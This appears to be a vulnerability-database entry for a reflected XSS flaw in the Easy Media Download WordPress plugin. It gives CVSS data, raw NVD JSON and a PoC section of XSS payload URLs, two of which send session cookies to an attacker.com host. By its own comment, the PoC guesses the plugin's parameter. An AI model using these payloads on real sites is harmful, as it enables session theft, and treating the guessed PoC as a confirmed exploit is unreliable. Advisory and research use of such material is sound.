Security Vulnerability Report
中文
CVE-2025-69169 CVSS 5.4 MEDIUM

CVE-2025-69169

Published: 2026-01-08 10:15:55
Last Modified: 2026-04-27 21:16:23

Description

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through <= 1.1.11.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Easy Media Download (easy-media-download) <= 1.1.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69169 XSS PoC --> <!-- 反射型XSS漏洞测试payload --> <!-- 基本弹窗测试 --> https://target-site.com/?download_id=<script>alert('XSS')</script> <!-- Cookie窃取payload --> https://target-site.com/?download_id=<img src=x onerror="this.src='https://attacker.com/steal?c='+document.cookie"> <!-- 事件处理器注入 --> https://target-site.com/?download_id=<svg onload=alert(document.domain)> <!-- 编码绕过测试 --> https://target-site.com/?download_id=%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E <!-- 具体利用示例 - 需要结合实际插件端点 --> <!-- 假设插件使用emd_download参数 --> <!-- https://example.com/?emd_download=<script>fetch('https://attacker.com/log?cookie='+btoa(document.cookie))</script> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69169", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:54.607", "lastModified": "2026-04-27T21:16:23.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Noor Alam Easy Media Download easy-media-download allows Reflection Injection.This issue affects Easy Media Download: from n/a through <= 1.1.11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-80"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/easy-media-download/vulnerability/wordpress-easy-media-download-plugin-1-1-11-css-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}